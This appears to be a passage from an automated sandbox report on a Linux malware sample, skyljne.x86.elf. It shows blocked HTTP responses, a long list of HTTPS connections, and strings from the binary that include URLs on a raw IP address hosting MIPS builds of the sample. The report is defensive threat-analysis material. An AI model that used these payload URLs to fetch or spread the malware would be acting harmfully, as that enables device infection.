          Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Type: text/htmlCache-Control: no-cache, no-storeConnection: closeContent-Length: 686X-Iinfo: 15-12463268-0 0NNN RT(1705243890026 0) q(0 -1 -1 -1) r(0 -1)Data Raw: 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 68 65 61 64 3e 3c 4d 45 54 41 20 4e 41 4d 45 3d 22 52 4f 42 4f 54 53 22 20 43 4f 4e 54 45 4e 54 3d 22 4e 4f 49 4e 44 45 58 2c 20 4e 4f 46 4f 4c 4c 4f 57 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 69 66 72 61 6d 65 20 69 64 3d 22 6d 61 69 6e 2d 69 66 72 61 6d 65 22 20 73 72 63 3d 22 2f 5f 49 6e 63 61 70 73 75 6c 61 5f 52 65 73 6f 75 72 63 65 3f 43 57 55 44 4e 53 41 49 3d 35 26 78 69 6e 66 6f 3d 31 35 2d 31 32 34 36 33 32 36 38 2d 30 25 32 30 30 4e 4e 4e 25 32 30 52 54 25 32 38 31 37 30 35 32 34 33 38 39 30 30 32 36 25 32 30 30 25 32 39 25 32 30 71 25 32 38 30 25 32 30 2d 31 25 32 30 2d 31 25 32 30 2d 31 25 32 39 25 32 30 72 25 32 38 30 25 32 30 2d 31 25 32 39 26 69 6e 63 69 64 65 6e 74 5f 69 64 3d 30 2d 35 39 34 37 34 31 33 34 35 33 32 30 33 32 39 37 35 26 65 64 65 74 3d 39 26 63 69 6e 66 6f 3d 66 66 66 66 66 66 66 66 26 72 70 69 6e 66 6f 3d 30 26 6d 74 68 3d 50 4f 53 54 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 30 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 20 6d 61 72 67 69 6e 68 65 69 67 68 74 3d 22 30 70 78 22 20 6d 61 72 67 69 6e 77 69 64 74 68 3d 22 30 70 78 22 3e 52 65 71 75 65 73 74 20 75 6e 73 75 63 63 65 73 73 66 75 6c 2e 20 49 6e 63 61 70 73 75 6c 61 20 69 6e 63 69 64 65 6e 74 20 49 44 3a 20 30 2d 35 39 34 37 34 31 33 34 35 33 32 30 33 32 39 37 35 3c 2f 69 66 72 61 6d 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html style="height:100%"><head><META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"></head><body style="margin:0px;height:100%"><iframe id="main-iframe" src="/_Incapsula_Resource?CWUDNSAI=5&xinfo=15-12463268-0%200NNN%20RT%281705243890026%200%29%20q%280%20-1%20-1%20-1%29%20r%280%20-1%29&incident_id=0-59474134532032975&edet=9&cinfo=ffffffff&rpinfo=0&mth=POST" frameborder=0 width="100%" height="100%" marginheight="0px" marginwidth="0px">Request unsuccessful. Incapsula incident ID: 0-59474134532032975</iframe></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Type: text/htmlCache-Control: no-cache, no-storeConnection: closeContent-Length: 686X-Iinfo: 13-13354069-0 0NNN RT(1705243911129 0) q(0 -1 -1 -1) r(0 -1)Data Raw: 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 68 65 61 64 3e 3c 4d 45 54 41 20 4e 41 4d 45 3d 22 52 4f 42 4f 54 53 22 20 43 4f 4e 54 45 4e 54 3d 22 4e 4f 49 4e 44 45 58 2c 20 4e 4f 46 4f 4c 4c 4f 57 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 69 66 72 61 6d 65 20 69 64 3d 22 6d 61 69 6e 2d 69 66 72 61 6d 65 22 20 73 72 63 3d 22 2f 5f 49 6e 63 61 70 73 75 6c 61 5f 52 65 73 6f 75 72 63 65 3f 43 57 55 44 4e 53 41 49 3d 35 26 78 69 6e 66 6f 3d 31 33 2d 31 33 33 35 34 30 36 39 2d 30 25 32 30 30 4e 4e 4e 25 32 30 52 54 25 32 38 31 37 30 35 32 34 33 39 31 31 31 32 39 25 32 30 30 25 32 39 25 32 30 71 25 32 38 30 25 32 30 2d 31 25 32 30 2d 31 25 32 30 2d 31 25 32 39 25 32 30 72 25 32 38 30 25 32 30 2d 31 25 32 39 26 69 6e 63 69 64 65 6e 74 5f 69 64 3d 30 2d 36 38 31 37 30 30 33 38 38 33 37 38 34 34 34 39 33 26 65 64 65 74 3d 39 26 63 69 6e 66 6f 3d 66 66 66 66 66 66 66 66 26 72 70 69 6e 66 6f 3d 30 26 6d 74 68 3d 50 4f 53 54 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 30 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 20 6d 61 72 67 69 6e 68 65 69 67 68 74 3d 22 30 70 78 22 20 6d 61 72 67 69 6e 77 69 64 74 68 3d 22 30 70 78 22 3e 52 65 71 75 65 73 74 20 75 6e 73 75 63 63 65 73 73 66 75 6c 2e 20 49 6e 63 61 70 73 75 6c 61 20 69 6e 63 69 64 65 6e 74 20 49 44 3a 20 30 2d 36 38 31 37 30 30 33 38 38 33 37 38 34 34 34 39 33 3c 2f 69 66 72 61 6d 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html style="height:100%"><head><META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"></head><body style="margin:0px;height:100%"><iframe id="main-iframe" src="/_Incapsula_Resource?CWUDNSAI=5&xinfo=13-13354069-0%200NNN%20RT%281705243911129%200%29%20q%280%20-1%20-1%20-1%29%20r%280%20-1%29&incident_id=0-68170038837844493&edet=9&cinfo=ffffffff&rpinfo=0&mth=POST" frameborder=0 width="100%" height="100%" marginheight="0px" marginwidth="0px">Request unsuccessful. Incapsula incident ID: 0-68170038837844493</iframe></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
          Source: skyljne.x86.elfString found in binary or memory: http://103.245.236.152/skyljne.mips;$
          Source: skyljne.x86.elfString found in binary or memory: http://103.245.236.152/skyljne.mpsl;
          Source: skyljne.x86.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: skyljne.x86.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
          Source: unknownNetwork traffic detected: HTTP traffic on port 57084 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50452 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 39648 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50440 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 36130 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 47270 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 35298 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 40650 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 60266 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 54802 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 45088 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50464 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 36154 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 60242 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 35274 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 37480 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57096 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 40662 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 60278 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 52608 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 54814 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 37010 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 53958 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 51320 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 45076 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 47282 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 59290 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 35262 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 53934 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41816
          Source: unknownNetwork traffic detected: HTTP traffic on port 40674 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41818
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41812
          Source: unknownNetwork traffic detected: HTTP traffic on port 49426 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41814
          Source: unknownNetwork traffic detected: HTTP traffic on port 36166 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49438 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41810
          Source: unknownNetwork traffic detected: HTTP traffic on port 60230 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 41938 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41808
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41804
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41806
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41800
          Source: unknownNetwork traffic detected: HTTP traffic on port 37022 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41802
          Source: unknownNetwork traffic detected: HTTP traffic on port 53946 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 37034 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 40686 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 39600 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 59216 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 37492 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 34394 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 36178 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 35250 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 56180 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 41530 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 40216 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 41926 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53848
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53846
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38210
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53840
          Source: unknownNetwork traffic detected: HTTP traffic on port 41914 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 38744 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38212
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53844
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38214
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53842
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38216
          Source: unknownNetwork traffic detected: HTTP traffic on port 48186 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 48558 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38206
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38208
          Source: unknownNetwork traffic detected: HTTP traffic on port 37046 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 38372 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41856
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41858
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41852
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41854
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41850
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53858
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53856
          Source: unknownNetwork traffic detected: HTTP traffic on port 37058 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53850
          Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38200
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38202
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53854
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38204
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53852
          Source: unknownNetwork traffic detected: HTTP traffic on port 53910 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41848
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41844
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41846
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41840
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41842
          Source: unknownNetwork traffic detected: HTTP traffic on port 52200 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 44196 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51208
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53868
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51206
          Source: unknownNetwork traffic detected: HTTP traffic on port 38360 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 58348 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 42410 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53862
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51200
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53860
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53866
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51204
          Source: unknownNetwork traffic detected: HTTP traffic on port 56192 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53864
          Source: unknownNetwork traffic detected: HTTP traffic on port 40204 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51202
          Source: unknownNetwork traffic detected: HTTP traffic on port 59228 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41838
          Source: unknownNetwork traffic detected: HTTP traffic on port 48534 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41834
          Source: unknownNetwork traffic detected: HTTP traffic on port 38756 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41836
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41830
          Source: unknownNetwork traffic detected: HTTP traffic on port 38768 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 41902 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41832
          Source: unknownNetwork traffic detected: HTTP traffic on port 53922 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51218
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51216
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53878
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51210
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53872
          Source: unknownNetwork traffic detected: HTTP traffic on port 44184 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 58336 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53870
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51214
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53876
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51212
          Source: unknownNetwork traffic detected: HTTP traffic on port 52212 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53874
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41826
          Source: unknownNetwork traffic detected: HTTP traffic on port 40698 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41828
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53880
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41822
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41824
          Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41820
          Source: unknownNetwork traffic detected: HTTP traffic on port 48174 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53804
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53808
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38250
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38252
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53806
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38254
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38256
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53800
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38258
          Source: unknownNetwork traffic detected: HTTP traffic on port 54838 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 37864 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 48150 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41896
          Source: unknownNetwork traffic detected: HTTP traffic on port 58324 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41898
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41892
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41894
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53814
          Source: unknownNetwork traffic detected: HTTP traffic on port 48162 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41890
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53812
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53818
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38240
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53816
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38242
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38244
          Source: unknownNetwork traffic detected: HTTP traffic on port 42434 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38246
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38248
          Source: unknownNetwork traffic detected: HTTP traffic on port 42806 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41888
          Source: unknownNetwork traffic detected: HTTP traffic on port 38396 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41884
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41886
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41880
          Source: unknownNetwork traffic detected: HTTP traffic on port 50476 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41882
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53826
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53824
          Source: unknownNetwork traffic detected: HTTP traffic on port 51790 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53828
          Source: unknownNetwork traffic detected: HTTP traffic on port 37852 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38230
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38232
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38234
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38236
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53822
          Source: unknownNetwork traffic detected: HTTP traffic on port 49078 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38238
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53820
          Source: unknownNetwork traffic detected: HTTP traffic on port 58312 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38228
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41878
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41874
          Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41876
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41872
          Source: unknownNetwork traffic detected: HTTP traffic on port 48546 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 54430 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 42818 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53834
          Source: unknownNetwork traffic detected: HTTP traffic on port 38384 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53838
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38220
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38222
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38224
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53832
          Source: unknownNetwork traffic detected: HTTP traffic on port 50488 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38226
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53830
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38218
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41866
          Source: unknownNetwork traffic detected: HTTP traffic on port 42422 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41868
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41862
          Source: unknownNetwork traffic detected: HTTP traffic on port 36142 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 36538 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41864
          Source: unknownNetwork traffic detected: HTTP traffic on port 60254 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 41108 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41860
          Source: unknownNetwork traffic detected: HTTP traffic on port 43302 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38170
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38172
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38174
          Source: unknownNetwork traffic detected: HTTP traffic on port 39288 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51144
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38176
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51142
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38178
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51148
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51146
          Source: unknownNetwork traffic detected: HTTP traffic on port 47642 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51152
          Source: unknownNetwork traffic detected: HTTP traffic on port 36514 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51150
          Source: unknownNetwork traffic detected: HTTP traffic on port 53598 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 60626 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 33970 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 33500 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 53116 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 36984 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38160
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38162
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38164
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38166
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51156
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38168
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51154
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51158
          Source: unknownNetwork traffic detected: HTTP traffic on port 54442 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51162
          Source: unknownNetwork traffic detected: HTTP traffic on port 41098 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57456 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51160
          Source: unknownNetwork traffic detected: HTTP traffic on port 50812 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 46798 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 43784 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 47630 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38150
          Source: unknownNetwork traffic detected: HTTP traffic on port 33994 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38152
          Source: unknownNetwork traffic detected: HTTP traffic on port 33490 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51166
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38154
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51164
          Source: unknownNetwork traffic detected: HTTP traffic on port 36526 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38156
          Source: unknownNetwork traffic detected: HTTP traffic on port 60638 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 36972 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38158
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51168
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51170
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51174
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51172
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41796
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41798
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41792
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41794
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41790
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38140
          Source: unknownNetwork traffic detected: HTTP traffic on port 50824 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38142
          Source: unknownNetwork traffic detected: HTTP traffic on port 41086 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57444 -> 443
